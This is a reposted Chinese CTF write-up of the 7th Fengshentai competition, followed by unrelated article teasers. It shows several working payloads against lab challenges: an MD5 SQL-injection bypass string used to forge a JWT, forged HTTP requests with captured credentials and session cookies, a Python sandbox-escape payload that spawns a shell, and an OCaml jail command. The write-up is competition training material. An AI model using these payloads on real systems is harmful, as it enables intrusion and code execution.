第七届封神台CTF

news/2025/1/7 17:40:06/文章来源:https://www.cnblogs.com/lpppp/p/18655013

第七届封神台CTF

Web

welcome_to_zkaqctf

image-20250105174952-hett3wi

源码：

const {promises: fs} = require('fs');
const fastify = require('fastify');const flag = process.env.FLAG || 'zkaq{do_you_believe_this_is_flag?}';const app = fastify();
app.get('/', async (_, res) => {
res.type('text/html').send(await fs.readFile('index.html'));
});
app.post('/', (req, res) => {if (typeof req.body === 'object' && req.body[flag] === true) {return res.send(`OhoUhOu~ flag is ${flag}`);}return res.send(`emmmmmmmwmwmwmwm NO...`);
});

思路：

传一个 null 就行，req.body[null] === true

image-20250105175400-fx1efa7

flag：zkaq{S0metime_Empty_1s_FU11}

科目四

直接打答完题就行

image-20250105175916-ejdecig

flag：ZKAQCTF{d0_y0u_think_netw0rk_security_imp0rtant?}

诗和远方

思路：

先审计源码

image-20250105181312-wefvibp

学习：ffifdyop——绕过中一个奇妙的字符串 - 你知道是我的 - 博客园

可以先使用 md5 绕过，使用用万能密码，ffifdyop，然后发现 Cookies，Secret 是 a_passenger_signing_key_give?

image-20250105181853-niuccnb

image-20250105182054-3pelsr7

然后使用万能密码替换 kid，Secret 就是上面找到的

image-20250105182448-lh3pxco

eyJhbGciOiJIUzI1NiIsImtpZCI6ImZmaWZkeW9wIiwidHlwIjoiSldUIn0.eyJ0eXBlIjoicGFzc2VuZ2VyIn0.tcp_Agxg2lLbh6-Ys0hZ2-5uoQAtGbh7tAnIVFSfTmU

image-20250105185907-ayaehjn

得到新的 secret

conductor_key_514063370356d5cddb4363b4786fd072d36a25e0ab60a78b8df01bd396c7a05cccbbb3733ae3f8e

image-20250105190030-0i6yft1

最后在替换新的 jwt，发送就拿到 flag

image-20250105190102-1335mnn

flag：zkaq{DuduDu_1etS_9o_to_P0etry_@nd_distance!}

为了部落！

原题：CTFtime.org / 34C3 CTF / JuniorCTF - 披萨门 / Writeup

思路：

后面随便跟个东西，发现报错

image-20250105191403-xj7bola

这是 Django 框架调试页面的形式产生结果，

^$ [name='index']

^admin

^robots.txt$

^foobarbaz/

^static/(?P.*)$

我们访问 foobarbaz/ 会弹出来一个认证

image-20250105192017-3qx88jv

Authorization: Basic YWRtaW46Ig%3d%3d

image-20250105194925-ivj98c1

可以发现角色为 admin 的用户名和密码

sh1a:just_do_it_goddamnit

image-20250105195212-cmsg5wt

创建一个账号先

image-20250105195630-nryx7lx

访问 url/foobarbaz/pizza/create

image-20250105205401-a09ci5o

我们这里有个商品买不了，我们先创建一个商品，价格为负的

image-20250105211907-ecy3103

POST /foobarbaz/pizza/create HTTP/1.1
Host: r7ikie1s.lab.aqlab.cn
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Referer: http://r7ikie1s.lab.aqlab.cn/foobarbaz/pizza/create
Accept-Encoding: gzip, deflate
Authorization: Basic c2gxYTpqdXN0X2RvX2l0X2dvZGRhbW5pdA==
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Origin: http://r7ikie1s.lab.aqlab.cn
Upgrade-Insecure-Requests: 1
Cookie: csrftoken=mif46n38yuyop8HQY7rIBmDN0XkJgiJ65nqMtIR3OV6rQMZRpLEORKf3ORemXDTN; sessionid=ueb669ntszx036hkytidnmnajk76ycgi
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Priority: u=0, i
Content-Length: 110csrfmiddlewaretoken=5lDYUpTjbLeKtP9rWpxEQWO8kupRryEROqOGhKHercMNUtrsn3KK6kqo8oju8TOy&name=letmein2&toppings=letmein2&price=-2338

‍

POST /foobarbaz/order/create HTTP/1.1
Host: r7ikie1s.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Authorization: Basic c2gxYTpqdXN0X2RvX2l0X2dvZGRhbW5pdA==
Cookie: csrftoken=mif46n38yuyop8HQY7rIBmDN0XkJgiJ65nqMtIR3OV6rQMZRpLEORKf3ORemXDTN; sessionid=ueb669ntszx036hkytidnmnajk76ycgi
Referer: http://r7ikie1s.lab.aqlab.cn/foobarbaz/order/create
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Origin: http://r7ikie1s.lab.aqlab.cn
Priority: u=0, i
Content-Length: 95csrfmiddlewaretoken=8ZKc27d4Uatdfb1vykqk9UEK3pQK8a5dR4VUps1ZaB1gGPjwZYDqpig0RjKnPvfU&arms=letmein2

‍

发现这段代码可能存在 xxe 漏洞

Misc

misc1-签到

很明显，这是一段密文！你说对不对？逐流流随洋波波随逐波随流波洋逐波波流波逐随逐洋波波随波波流波逐洋波波逐流逐波流逐洋逐波随随流流流波洋波逐波逐随逐流流洋波随流逐随随随随洋波随流逐逐波逐流洋波逐波波流逐随随洋波逐随波随随流流洋波随流逐波随逐波洋波流波逐逐随波随洋波波逐流波波波流洋波流逐流随逐波逐洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随洋波波波随流随逐随浪波流逐逐浪波逐逐流浪波逐随波浪波流随波浪波流逐流浪波逐随流浪波流随逐浪波流逐波浪波流随随浪波流波随洪流随随浪波波流流洪流随波浪波流随流浪波波流流浪波流随流浪波流波随浪波随随随浪波流随逐浪波流波随浪波波流流浪波随随逐浪波流逐波浪波波流流浪波流随流浪波波波波浪波逐逐波浪波波流流浪波逐随逐浪波逐流流浪波波流流浪波波逐逐浪波逐逐随浪波流波波浪波波流流洪流随波浪波逐逐波浪波流波波浪波流流波

思路：

很明显随波逐流解码

image-20250105220425-sj4lxwo

flag：zkaq{crypt0_1s_st@rt_By_sUi_bo_Zhu_1iu}

来一杯tea

源码：

import astdef safe_import():print("Look! this guy is using imports!???O.o")def safe_call():print("Look! this guy is using calls!???o.O")class XiTiAiFu(ast.NodeTransformer):def visit_Call(self, node: ast.Call) -> ast.AST:return ast.Call(func=ast.Name(id='safe_call', ctx=ast.Load()), args=[], keywords=[])def visit_Import(self, node: ast.AST) -> ast.AST:return ast.Expr(value=ast.Call(func=ast.Name(id='safe_import', ctx=ast.Load()), args=[], keywords=[]))def visit_ImportFrom(self, node: ast.ImportFrom) -> ast.AST:return ast.Expr(value=ast.Call(func=ast.Name(id='safe_import', ctx=ast.Load()), args=[], keywords=[]))def visit_Assign(self, node: ast.Assign) -> ast.AST:return ast.Assign(targets=node.targets, value=ast.Constant(value=0))def visit_BinOp(self, node: ast.BinOp) -> ast.AST:return ast.BinOp(left=ast.Constant(0), op=node.op, right=ast.Constant(0))something = input('good morning guy,Do you need something：').splitlines()[0]box = ast.parse(something)
box = XiTiAiFu().visit(box)
ast.fix_missing_locations(box)exec(compile(box, '', 'exec'), {'__builtins__': {}}, {'safe_import': safe_import, 'safe_call': safe_call})

原题：misc/Astea - Starlight's Blog

exp：把人家的 cup 改成 box

box: 0 = safe_call.__globals__['box']; builtins: 0 = safe_call.__builtins__; box.__class__.__format__: 0 = builtins['eval']; f"{box:builtins['__import__']('os').system('sh')}"

image-20250105221635-ts26y3c

flag：zkaq{m@ybe_Pyth0n_s3ndb0x_1s_unS@fe}

黑客儿传奇：两小时

原题：CTFtime.org / Cryptoverse CTF 2023 / Misc/OJail / Writeup

image-20250105222844-dhtpqz8

发现 flag 不在这，搜索一下 flag

Sys.command "find / name 'flag'";;

image-20250105223021-o26631r

flag：zkaq{J41L3d_0000-C4mL@@!}

‍

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.hqwc.cn/news/864894.html

如若内容造成侵权/违法违规/事实不符，请联系编程知识网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

Activiti 手工新增历史环节20250116

手工新增（历史任务表）act_hi_taskinst，其实这个表记录加一条就可以注：字段2值为空，字段值10为空，字段11、12 值都要加-----act_hi_taskinst.PROC_DEF_ID myProcess:34:400000000000736-----act_hi_taskinst.PROC_INST_ID_ 400000000000496SELECT * FROM "act_hi_…

SQL语言做加减运算时将某项的null值转换为0

在SQL语言中，很多时候，在表项中会遇到null值，null值有三大特点：1）NULL值不参加统计；2）NULL值不进入计算表达式；3）不能与其它值进行比较。因此，在运算中要将null值有时候转换成其他值，这里提供一种加减运算中转换为0的方法。如：在算工资的时候，总工资=基础工资+奖…

中电金信携手华为发布“全链路实时营销解决方案”，重塑金融营销数智新生态

在数智化转型成为驱动经济社会高质量发展的新引擎背景下，“数智方案”栏目聚焦金融等国计民生重点行业场景，依托中电金信“源启筑基+咨询引领+应用重构”的产品及服务体系，输出市场洞察和行业解决方案、应用案例，旨在全面推动行业IT架构升级、数智化转型。数智驱动是金融机…

实时协作：如何通过协作文档提升团队生产力

在当今快节奏的工作环境中，团队协作的效率直接决定了项目的成败。然而，文档管理作为协作的核心环节，却常常成为效率的“隐形杀手”。无论是版本混乱、信息丢失，还是沟通不畅，这些问题都在无形中消耗着团队的时间和精力。而协作文档工具的出现，正是为了解决这些痛点，彻底…

win10重装如何跳过微软账号直接设置本地帐户.221111

在添加你的帐户界面，选择脱机帐户2. 第二个页面，选择有限的体验3. 第三个页面，设置自己本地的用户名4. 第四个页面，设置自己本地的密码.zstitle { width: 280px; text-align: center; font-size: 26px } .zsimgweixin { width: 280px } .zsimgali { width: 280px; paddin…

看板软件在利益相关者期望管理中的应用与探索

制定一个有效的利益相关者期望管理计划需要全面识别利益相关者、深入分析他们的期望、制定期望管理策略、制定详细的期望管理计划、实施与调整期望管理计划以及建立绩效评估机制。通过这些步骤，你可以确保项目目标与利益相关者的期望保持一致，提高项目的成功率和满意度。制定…

centos7安装docker.240103

1. installDocker.sh ，然后自行安装安装所需资源包 sudo yum install -y yum-utils 设置docker下载地址 sudo yum-config-manager \ --add-repo \ https://download.docker.com/linux/centos/docker-ce.repo安装docker sudo yum install docker-ce -y docker-ce-cli conta…

MySQL8设置root用户远程访问.240103

查询当前root状态,默认root的host是localhost use mysql; select user,host from user;update root的host为% update user set host = % where user =root;检查客户端windows 的防火墙，关闭防火墙try。.zstitle { width: 280px; text-align: center; font-size: 26px } .zsimg…

云计算真的很便宜吗？.240103

37Signals的首席技术官David Heinemeier Hansson表示，2022年一共在AWS（亚马逊云）花了3,201,564美元，即每月266,797美元。其中759,983美元都花费在AWS的EC2和EKS服务服务计算上面。 Heinemeier指出，即使是这个账单，也是团队共同努力保持cost down的结果。“这已经是一个…

Kettle用查出来的数据自动创建表.240105

Kettle在表输入的时候，写好很复杂的SQL，有种场景，就是想把这个很复杂的查出来的数据，自动创建一个表。其实，操作步骤不复杂。跟着我来做就是了。1，新建表输出，Shift按住，从表输入拖动箭头到表输出，打开表输出属性，指定数据库，输入需要创建的目标表名。2，点击右…

chrome浏览器调试窗口如何设置深色背景主题

前言大家好，我是小徐啊。chrome浏览器是我们常用的浏览器，在开发Java应用的时候，是经常需要用到的。而且，开发的时候，需要经常打开浏览器的调试模式，这个界面的默认主题是白色的，其实也可以设置成深色的主题，今天，小徐就来介绍下如何设置深色主题。如何设置深色主题…

FineReport取消强制分页和调整宽度的设置方法.240105

在decision里，找到管理系统-目录管理，打开相应挂载的报表，在参数设置里，添加以下内容： _bypagesize_ 字符串 false.zstitle { width: 280px; text-align: center; font-size: 26px } .zsimgweixin { width: 280px } .zsimgali { width: 280px; padding: 0px 0px 50px 0px …